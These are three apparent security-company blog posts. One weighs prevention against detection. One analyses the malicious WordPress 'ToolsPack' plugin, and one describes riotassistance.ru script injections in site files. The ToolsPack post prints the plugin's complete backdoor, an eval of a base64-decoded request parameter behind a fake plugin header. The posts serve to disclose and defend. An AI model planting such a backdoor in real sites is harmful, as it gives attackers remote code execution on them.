By

Has security moved from prevention to detection and response?

Recently, Symantec’s senior vice president of information security Brian Dye declared that anti-virus is dead, as told to the Wall Street Journal.

Is it?

Has the security industry moved away from prevention to early detection and quick response?

I know when I started WeWatchYourWebsite back in 2007, I started preaching prevention. However, it became evident that nobody was interested. It appeared that people, even then, were more interested in early detection and quick remediation.

If you look at many of the startups and large security companies, it becomes real clear that most of the industry is focused on early detection and quick remediation. Is this like closing the barn door after the horses are out?

Is this giving up on prevention and focusing instead on early detection? That, to me, is like admitting defeat to the cyber criminals of the world.

Or, is it a different strategy?

In combat, whether your battlefield is on soil or a chess board, one key strategy is to lure your opponent into an area and then close in and destroy them.

Could this work in cyber security?

Of course, we’ll never catch the cyber criminals, unless they’re really lazy, but can we capture their methods? That would be considered a victory.

battleIn the book, “The Art of War” it states:

All warfare is based on deception. Hence, when able to attack, we must seem unable; when using our forces, we must seem inactive; when we are near, we must make the enemy believe we are far away; when far away, we must make him believe we are near.

If our deception is to lure the cyber criminal into our website, but record and report everything, then we can consider that a victory for the masses. That information can be used to protect other websites and prevent other sites from being successfully breached.

What do you think?

Should focus be placed on detection and response? Is that a sound strategy?

Share your thoughts…

Thank you.

By

What is the ToolsPack plugin?

Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.

This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php

Inside that file looks like this:

/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.

Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.

How did we find this?

Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.

Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.

Further analysis of the datetime stamp on ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers and everyone of them with the ToolsPack plugin had a virus or trojan on them. This included Apple’s Mac.

Yes, the hackers are infected computers, both PCs and Macs with password stealing trojans. These password stealing trojans are stealing all passwords.

We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course. :)

Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.

Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.

We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.

If you assistance in recovering from this infection, please contact me directly at: traef@wewatchyourwebsite.com or by phone at: (847)728-0214.

Thank you.

By

riotassistance.ru infections

We’ve been seeing more website infections with a malscript that looks like:

(opening script tag) src="hxxp:// riotassistance.ru /Website.js">(closing script tag)

Note: We’ve also seen this same this but with nuttypiano replacing riotassistance.

Sometimes the last part: Website.js is something else:

Linux.js
Megabyte.js

and a few others. The common pattern here is obviously the riotassistance.ru domain and the last part of the URL has an upper-case first letter and is usually some random, but familiar word.

The other identifier is the seemingly useless string immediately following the malscript. In the example above it’s the:

Keep in mind that this will be different for each website, at least from what we’ve seen so far.

This malscript and it’s associated string has been found in index files and files that start with the word main, or in the footer.php file on WordPress sites. The footer.php that will be infected is usually in the theme folder for your site. So if you’re using the default theme, it will be the footer.php file in the theme/default folder on your site.

This same infection has been found in .js files as a document.write at the bottom of the .js file, such as this:

nuttypiano

Time to dig a little deeper…

We find that this domain is registered:

domain: RIOTASSISTANCE.RU
nserver: ns1.getyourdns.com.
nserver: ns2.getyourdns.com.
nserver: ns3.getyourdns.com.
nserver: ns4.getyourdns.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8482 735000
e-mail: angles@fastermail.ru
registrar: NAUNET-REG-RIPN

According to abuse.ch, this registrar has 126 sites that associated to Zeus:

riotassistance.ru associated to Zeus registrar

We also find that the above listed email address is only registered on 4 other domains.

As far as cleaning this goes, obviously remove the malscript from your pages or replace the pages with known good backups.

From what we’ve found so far, this website infection happens via stolen FTP credentials. These FTP credentials are stolen by a virus/trojan on a PC that’s been used to FTP files to the infected website.

First, change all FTP passwords – immediately.

Second, run a full virus scan on all PCs used to FTP files to the infected website. This includes developers, authors, etc.

Third, if your site has been listed as suspicious by Google, request a review from the Google Webmaster Tools.

Post here if you have questions or send me an email if you’d like further help in cleaning this up.

Thank you.